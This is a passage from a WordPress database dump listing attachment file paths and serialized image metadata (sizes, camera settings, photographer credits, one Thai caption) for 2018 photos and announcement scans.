(9983, 4546, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:39:\"2018/11/93-Roengchai-Kongmuang-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"93-Roengchai-Kongmuang-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"93-Roengchai-Kongmuang-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"93-Roengchai-Kongmuang-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"93-Roengchai-Kongmuang-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"93-Roengchai-Kongmuang-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark IV\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477578206\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"57\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:6:\"0.0008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9984, 4547, '_wp_attached_file', '2018/11/95-Roengchai-Kongmuang-copy.jpg'),
(9985, 4547, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:39:\"2018/11/95-Roengchai-Kongmuang-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"95-Roengchai-Kongmuang-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"95-Roengchai-Kongmuang-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"95-Roengchai-Kongmuang-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"95-Roengchai-Kongmuang-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"95-Roengchai-Kongmuang-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:31:\"เริงชัย คงเ\";s:6:\"camera\";s:8:\"ILCE-7M2\";s:7:\"caption\";s:512:\"วัยรุ่นหญิงชาวมุสลิม อ่านหนังสือพิมพ์ฉบับพิเศษในโอกาสสวรรคตของพระบามสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ ศูนย์บริหารกิจการศาสนาอิสลามแห่งชาติเฉลิมพระเกียรติ เขตหนองจอก กรุงเทพ\";s:17:\"created_timestamp\";s:10:\"1477069622\";s:9:\"copyright\";s:58:\"©เริงชัย คงเมือง/สวสส\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:27:\"ฉบับพิเศษ\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:7:{i:0;s:36:\"หนังสือพิมพ์\";i:1;s:21:\"หนองจอก\";i:2;s:18:\"มัสยิด\";i:3;s:63:\"ศูนย์บริหารกิจการศาสน\";i:4;s:54:\"มัสยิดกลางแห่งชาติ\";i:5;s:18:\"อิสลาม\";i:6;s:24:\"ขอดุอาร์\";}}}'),
(9986, 4548, '_wp_attached_file', '2018/11/10-Roengrit-Kongmuang-copy.jpg'),
(9987, 4548, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/10-Roengrit-Kongmuang-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"10-Roengrit-Kongmuang-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"10-Roengrit-Kongmuang-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"10-Roengrit-Kongmuang-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"10-Roengrit-Kongmuang-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"10-Roengrit-Kongmuang-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:17:\"RoengritKongmuang\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1478286038\";s:9:\"copyright\";s:17:\"RoengritKongmuang\";s:12:\"focal_length\";s:2:\"25\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:17:\"0.066666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9988, 4549, '_wp_attached_file', '2018/11/13-Roengrit-Kongmuang-copy.jpg'),
(9989, 4549, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/13-Roengrit-Kongmuang-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"13-Roengrit-Kongmuang-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"13-Roengrit-Kongmuang-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"13-Roengrit-Kongmuang-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"13-Roengrit-Kongmuang-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"13-Roengrit-Kongmuang-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"10\";s:6:\"credit\";s:17:\"RoengritKongmuang\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1484488710\";s:9:\"copyright\";s:17:\"RoengritKongmuang\";s:12:\"focal_length\";s:2:\"20\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9990, 4550, '_wp_attached_file', '2018/11/15-Roengrit-Kongmuang-copy.jpg'),
(9991, 4550, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/15-Roengrit-Kongmuang-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"15-Roengrit-Kongmuang-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"15-Roengrit-Kongmuang-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"15-Roengrit-Kongmuang-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"15-Roengrit-Kongmuang-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"15-Roengrit-Kongmuang-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:17:\"RoengritKongmuang\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1480787639\";s:9:\"copyright\";s:17:\"RoengritKongmuang\";s:12:\"focal_length\";s:2:\"16\";s:3:\"iso\";s:4:\"4000\";s:13:\"shutter_speed\";s:17:\"0.066666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9992, 4551, '_wp_attached_file', '2018/11/16-Roengrit-Kongmuang-copy.jpg'),
(9993, 4551, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/16-Roengrit-Kongmuang-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"16-Roengrit-Kongmuang-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"16-Roengrit-Kongmuang-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"16-Roengrit-Kongmuang-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"16-Roengrit-Kongmuang-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"16-Roengrit-Kongmuang-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:17:\"RoengritKongmuang\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477583008\";s:9:\"copyright\";s:17:\"RoengritKongmuang\";s:12:\"focal_length\";s:3:\"182\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9994, 4552, '_wp_attached_file', '2018/11/35-Roengrit-Kongmuang-copy.jpg'),
(9995, 4552, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/35-Roengrit-Kongmuang-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"35-Roengrit-Kongmuang-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"35-Roengrit-Kongmuang-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"35-Roengrit-Kongmuang-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"35-Roengrit-Kongmuang-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"35-Roengrit-Kongmuang-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:17:\"RoengritKongmuang\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1481884122\";s:9:\"copyright\";s:17:\"RoengritKongmuang\";s:12:\"focal_length\";s:2:\"20\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9996, 4553, '_wp_attached_file', '2018/11/36-Roengrit-Kongmuang-copy.jpg'),
(9997, 4553, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/36-Roengrit-Kongmuang-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"36-Roengrit-Kongmuang-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"36-Roengrit-Kongmuang-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"36-Roengrit-Kongmuang-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"36-Roengrit-Kongmuang-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"36-Roengrit-Kongmuang-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:17:\"RoengritKongmuang\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1481651674\";s:9:\"copyright\";s:17:\"RoengritKongmuang\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:4:\"1250\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9998, 4554, '_wp_attached_file', '2018/11/51-Roengrit-Kongmuang-copy.jpg'),
(9999, 4554, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/51-Roengrit-Kongmuang-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"51-Roengrit-Kongmuang-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"51-Roengrit-Kongmuang-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"51-Roengrit-Kongmuang-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"51-Roengrit-Kongmuang-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"51-Roengrit-Kongmuang-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:17:\"RoengritKongmuang\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477587104\";s:9:\"copyright\";s:17:\"RoengritKongmuang\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(10000, 4555, '_wp_attached_file', '2018/11/52-Roengrit-Kongmuang-copy.jpg'),
(10001, 4555, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/52-Roengrit-Kongmuang-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"52-Roengrit-Kongmuang-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"52-Roengrit-Kongmuang-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"52-Roengrit-Kongmuang-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"52-Roengrit-Kongmuang-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"52-Roengrit-Kongmuang-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:17:\"RoengritKongmuang\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476987060\";s:9:\"copyright\";s:17:\"RoengritKongmuang\";s:12:\"focal_length\";s:2:\"19\";s:3:\"iso\";s:4:\"1000\";s:13:\"shutter_speed\";s:3:\"1.6\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(10002, 4556, '_wp_attached_file', '2018/11/79-Roengrit-Kongmuang-copy.jpg'),
(10003, 4556, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/79-Roengrit-Kongmuang-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"79-Roengrit-Kongmuang-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"79-Roengrit-Kongmuang-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"79-Roengrit-Kongmuang-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"79-Roengrit-Kongmuang-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"79-Roengrit-Kongmuang-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"11\";s:6:\"credit\";s:17:\"RoengritKongmuang\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1478016842\";s:9:\"copyright\";s:17:\"RoengritKongmuang\";s:12:\"focal_length\";s:2:\"30\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:8:\"0.003125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(10004, 4558, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-01.png'),
(10005, 4558, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:877;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-01-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-01-768x1087.png\";s:5:\"width\";i:768;s:6:\"height\";i:1087;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-01-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-01-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10006, 4559, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-02.png'),
(10007, 4559, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-02.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-02-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-02-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-02-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-02-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-02-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10008, 4560, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-03.png'),
(10009, 4560, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-03.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-03-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-03-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-03-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-03-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-03-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10010, 4561, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-04.png'),
(10011, 4561, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-04.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-04-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-04-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-04-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-04-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-04-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\"